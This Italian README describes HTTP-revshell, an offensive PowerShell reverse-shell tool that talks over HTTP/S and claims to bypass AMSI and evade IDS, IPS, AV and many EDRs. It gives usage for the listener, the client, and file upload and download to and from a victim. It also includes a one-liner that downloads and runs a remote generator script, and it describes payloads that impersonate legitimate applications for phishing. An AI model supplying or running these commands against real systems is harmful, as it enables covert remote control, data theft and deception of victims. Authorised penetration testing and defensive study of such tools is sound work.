
Reverse shell in PowerShell che utilizza il protocollo HTTP/S con bypass di AMSI e supporto proxy
HTTP-revshell è uno strumento focalizzato su esercizi di redteam e penetration tester. Questo strumento fornisce una connessione inversa attraverso il protocollo http/s. Utilizza un canale nascosto per ottenere il controllo della macchina vittima tramite richieste web e quindi eludere soluzioni come IDS, IPS e AV.
NOTA: Lo strumento non sarà mantenuto in termini di evasione. Con pochi cambiamenti puoi bypassare molti EDR presenti sul mercato.

Server usage:
usage: server.py [-h] [--ssl] [--autocomplete] host port
positional arguments:
host Listen Host
port Listen Port
optional arguments:
-h, --help show this help message and exit
--ssl Send traffic over ssl
--autocomplete Autocomplete powershell functions
Client usage:
Import-Module .\Invoke-WebRev.ps1
Invoke-WebRev -ip IP -port PORT [-ssl]
git clone https://github.com/3v4Si0N/HTTP-revshell.git
cd HTTP-revshell/
pip3 install -r requirements.txt
Questa funzione ti permette di caricare qualsiasi file sulla macchina vittima.
Usage:
upload /src/path/file C:\dest\path\file
Questa funzione ti permette di scaricare un file sulla macchina dell'attaccante.
Usage:
download C:\src\path\file /dst/path/file
Questa funzione ti permette di caricare script PowerShell senza dover scrivere sul disco della vittima, leggendo il file attraverso traffico HTTP legittimo.
Usage:
loadps1 /path/to/the/local/server/PowershellScript.ps1
Questo script ti permette di creare un file eseguibile con il payload necessario per usare HTTP-revshell, devi solo seguire le istruzioni sullo schermo per generarlo. Ci sono 6 template predefiniti e uno personalizzabile, con i dati che preferisci.
I payload generati dallo strumento incorporano l'icona legittima dell'applicazione, così come le informazioni sul prodotto e sul copyright dell'applicazione originale. Inoltre, ciascuno di essi apre l'applicazione originale prima di stabilire la connessione con il server, fingendo di essere un'applicazione legittima. Questo può essere usato per phishing o esercizi di Red Team.
Payload Generator usage:
powershell "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1 | iex"

IMPORTANTE: Tutti i campi nei template predefiniti vengono completati automaticamente premendo il tasto Invio.
Questo script è concesso in licenza LGPLv3+. Link diretto alla Licenza.
HTTP-revshell dovrebbe essere utilizzato solo per test di penetrazione autorizzati e/o scopi educativi senza scopo di lucro. Qualsiasi uso improprio di questo software non sarà di responsabilità dell'autore o di qualsiasi altro collaboratore. Usalo sui tuoi server e/o con il permesso del proprietario del server.